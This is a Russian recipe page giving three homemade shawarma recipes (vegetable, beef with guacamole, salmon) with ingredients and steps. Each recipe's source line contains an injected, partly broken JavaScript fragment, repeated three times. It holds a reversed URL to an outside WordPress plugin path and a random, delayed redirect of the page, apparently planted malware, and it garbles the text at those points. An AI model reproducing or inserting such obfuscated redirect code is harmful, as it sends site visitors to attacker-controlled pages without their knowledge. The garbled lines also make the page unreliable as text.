Овощная, мясная и даже рыбная — мы уверены, что такую шаурму вы ещё никогда не ели. Скорее закупайте ингредиенты и удивляйте своих домочадцев.
Овощная шаурма
Яркое, вкусное и вполне самостоятельное блюдо, которое точно стоит попробовать. Не стесняйтесь экспериментировать и добавлять другие сезонные овощи. Нестрогие вегетарианцы также смогут оценить эту шаурму.
Фото: recipeshubs.com
Домашняя шаурма: 3 рецепта вкусного и сытного блюда
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
6
КАЛОРИЙНОСТЬ:
191 ккал
191 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Свёкла
2 шт.
Морковь
2 шт.
Белокочанная капуста
150 г
Груша
1 шт.
Мята
½ пучка
Петрушка
½ пучка
Цельнозерновая тортилья
6 шт.
Фета
50 г
Натуральный йогурт
5 ст. л.
Горчица
½ ч. л.
Яблочный уксус
3 ч. л.
Оливковое масло
2 ст. л.
- Тщательно промойте свёклу и морковь под прохладной водой. Очистите от кожуры.
- Крупно натрите морковь. Мелко нарежьте капусту, тонко нарежьте или крупно натрите грушу (возьмите грушу твёрдого сорта, чтобы тортилья не стала мокрой от сока). Сложите всё в миску.
- Крупно натрите свёклу (возьмите свёклу маленького размера) и положите в миску к моркови.
- Отделите листья мяты и петрушки от стеблей и мелко нарежьте. Отправьте в миску.
- Смешайте йогурт, горчицу, уксус и оливковое масло до однородной текстуры. Попробуйте на вкус. Добавьте то, чего, на ваш взгляд, не хватает. Сбрызните овощную смесь заправкой.
- Разложите салат по тортильям (можно взять бездрожжевой лаваш), покрошите немного феты и заверните.
Шаурма с мясом и соусом гуакамоле
Традиционная мясная шаурма с мексиканской изюминкой.
Фото: chefkoch.de
Домашняя шаурма: 3 рецепта вкусного и сытного блюда
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
531 ккал
531 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Авокадо
2 шт.
Помидоры
2 шт.
Чеснок
зубчик
Молотый тмин
4 щепотки
Зелёный лук
2 шт.
Кинза
пучок
Лайм
1 шт.
Говядина (стейки)
560 г
Сушёный орегано
1 ч. л.
Сладкая паприка
1 ст. л.
Цельнозерновая тортилья
4 шт.
Натуральный йогурт
4 ст. л.
Красный перец чили
1—2 шт.
Морская соль, молотый чёрный перец
по вкусу
Оливковое масло
по вкусу
- Приготовьте соус гуакамоле — положите в блендер очищенный и нарезанный авокадо, половинки помидоров (возьмите спелые), нарубленный зубчик чеснока и зелёный лук (без белой головки), молотый тмин, почти всю кинзу (оставьте пару стеблей для украшения) и взбейте до кремообразной консистенции. Переложите соус в миску, добавьте по вкусу соль, перец, сок лайма и немного оливкового масла.
- Хорошо разогрейте сковороду-гриль. Натрите говядину солью, перцем, орегано и паприкой. Постучите по стейкам кастрюлей или скалкой, чтобы слегка расплющить их. Сбрызните стейки оливковым маслом и положите их на уже разогретую сковороду. Обжаривайте стейк с каждой стороны по минуте, в сумме около 5—6 минут.
- Выложите стейки на тарелку и дайте им отдохнуть. В это время разложите тортильи и смажьте их гуакамоле. Нарежьте стейки тонкими полосками, разделите между тортильями. Сбрызните немного оливковым маслом, выделившимся соком от мяса и заверните.
- Сверху положите немного йогурта, листочки кинзы и по желанию перец чили (аккуратно очистите его от семян и тонко нарежьте). Подавайте с дольками лайма.
Шаурма с лососем
Да, «шаурма с лососем» звучит необычно. Но не пугайтесь — на самом деле это очень вкусно.
Фото: missionmenus.com
Домашняя шаурма: 3 рецепта вкусного и сытного блюда
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
30 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
452 ккал
452 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
Филе лосося
4 шт. по 125 г
Кинза
½ пучка
Мята
½ пучка
Натуральный йогут
150 г
Огурец
1 шт.
Лук шалот
2 шт.
Красный перец чили
1 шт.
Тортильи
4 шт.
Белый винный уксус
1 ст. л.
Морская соль
по вкусу
Молотый чёрный перец
по вкусу
Сахар
щепотка
Оливковое масло
по вкусу
- Натрите лосося (но не кожу) солью, чёрным перцем, сбрызните маслом.
- Разогрейте сковороду на среднем огне. Положите филе лосося кожей вниз на сковороду и оставьте на 8—9 минут или до готовности, пока кожа не станет хрустящей. Переверните рыбу и сразу выключите огонь — филе окончательно приготовится за счёт остаточного тепла.
- Отложите пару стеблей кинзы в сторону. У остальных оторвите листочки и нарубите вместе с листиками мяты. Смешайте с йогуртом.
- Нарежьте огурец на тонкие пластинки (воспользуйтесь овощечисткой). Мелко нарежьте лук шалот и перец чили. Переложите все овощи в одну миску. Добавьте туда уксус, сахар, щепотку соли и перемешайте.
- Нарежьте филе лосося на крупные кубики (по желанию снимите кожицу) и разложите на тортильи (можно взять кукурузные или цельнозерновые). Добавьте соус из йогурта и трав, все овощи, оставшиеся листочки кинзы и скрутите.